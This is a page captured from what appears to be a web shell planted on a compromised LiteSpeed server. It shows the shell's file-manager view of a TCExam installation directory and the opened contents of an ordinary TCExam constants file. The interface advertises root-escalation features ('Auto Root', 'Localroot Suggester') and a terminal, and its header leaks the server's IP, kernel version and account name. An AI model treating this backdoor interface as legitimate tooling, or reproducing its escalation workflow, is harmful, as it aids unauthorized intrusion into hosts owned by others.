Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.64
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
tcexam /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-07-17 08:51
php53
[ DIR ]
drwxr-xr-x
2026-07-17 08:51
php56
[ DIR ]
drwxr-xr-x
2026-07-17 08:51
php71
[ DIR ]
drwxr-xr-x
2026-07-17 08:51
php81
[ DIR ]
drwxr-xr-x
2026-07-17 08:51
php82
[ DIR ]
drwxr-xr-x
2026-07-17 08:51
upgrade
[ DIR ]
drwxr-xr-x
2026-07-17 08:51
changelog.txt
2.65
KB
-rw-r--r--
2026-06-30 06:51
check_utf8.php
1.07
KB
-rw-r--r--
2026-06-30 06:51
clone.php
5.46
KB
-rw-r--r--
2026-07-16 11:53
edit.php
4.98
KB
-rw-r--r--
2026-07-16 11:53
edit.xml
433
B
-rw-r--r--
2021-12-23 11:54
extend.php
11.3
KB
-rw-r--r--
2026-07-16 11:53
fileindex.php
644
B
-rw-r--r--
2026-06-30 06:51
import.php
3.35
KB
-rw-r--r--
2026-07-16 11:53
info.xml
2.48
KB
-rw-r--r--
2026-07-16 10:57
install.js
921
B
-rw-r--r--
2021-12-23 11:54
install.php
6.97
KB
-rw-r--r--
2026-07-16 11:53
install.xml
750
B
-rw-r--r--
2021-12-23 11:54
md5
2.31
KB
-rw-r--r--
2026-07-16 11:53
notes.txt
1.45
KB
-rw-r--r--
2026-07-14 12:15
tce_config.php
5.94
KB
-rw-r--r--
2026-06-30 06:51
tce_config_.php
7.36
KB
-rw-r--r--
2026-07-14 12:15
tce_db_config.php
4.12
KB
-rw-r--r--
2026-06-30 06:51
tce_general_constants.php
2.46
KB
-rw-r--r--
2026-06-30 06:51
tce_paths.php
4.72
KB
-rw-r--r--
2026-06-30 06:51
update_pass.php
298
B
-rw-r--r--
2021-12-23 11:54
upgrade.php
5.29
KB
-rw-r--r--
2026-07-16 11:53
upgrade.xml
381
B
-rw-r--r--
2026-06-30 06:51
Save
Rename
<?php //============================================================+ // File name : tce_general_constants.php // Begin : 2002-03-01 // Last Update : 2023-11-30 // // Description : Configuration file for general constants. // // License: // Copyright (C) 2004-2026 Nicola Asuni - Tecnick.com LTD // See LICENSE file for more information. //============================================================+ /** * @file * Configuration file for general constants. * @package com.tecnick.tcexam.shared.cfg * @author Nicola Asuni * @since 2002-03-01 */ /** * String used as a seed for some security code generation. * SECURITY: this value MUST be unique and secret for every installation. The installer * (install/tce_functions_install.php) replaces the placeholder below with a random value. * If it is left at the shipped placeholder (or the historical default), the security * sensitive result-access token check fails closed - see F_isRandomSecurityConfigured(). */ define('K_RANDOM_SECURITY', '[[K_RANDOM_SECURITY]]'); /** * Maximum number of tests per year (last 365 days). * false = unlimited */ define('K_MAX_TESTS_YEAR', false); /** * Maximum number of tests per month (last 30 days). * false = unlimited */ define('K_MAX_TESTS_MONTH', false); /** * Maximum number of tests per day (last 24 hours). * false = unlimited */ define('K_MAX_TESTS_DAY', false); /** * Set to false to disable test counting. */ define('K_REMAINING_TESTS', false); // --------------------------------------------------------------------- // DO NOT ALTER THE FOLLOWING CONSTANTS // --------------------------------------------------------------------- /** * New line character. */ define('K_NEWLINE', "\n"); /** * Tabulation character. */ define('K_TAB', "\t"); /** * Number of seconds in one minute. */ define('K_SECONDS_IN_MINUTE', 60); /** * Number of seconds in one hour. */ define('K_SECONDS_IN_HOUR', 60 * K_SECONDS_IN_MINUTE); /** * Number of seconds in one day. */ define('K_SECONDS_IN_DAY', 24 * K_SECONDS_IN_HOUR); /** * Number of seconds in one week. */ define('K_SECONDS_IN_WEEK', 7 * K_SECONDS_IN_DAY); /** * Number of seconds in one month. */ define('K_SECONDS_IN_MONTH', 30 * K_SECONDS_IN_DAY); /** * Number of seconds in one year. */ define('K_SECONDS_IN_YEAR', 365 * K_SECONDS_IN_DAY); /** * String used for security feature, do not alter. */ define('K_KEY_SECURITY', 'VENFeGFtIChjKSAyMDA0LTIwMjAgTmljb2xhIEFzdW5pIC0gVGVjbmljay5jb20gLSB0Y2V4YW0uY29t');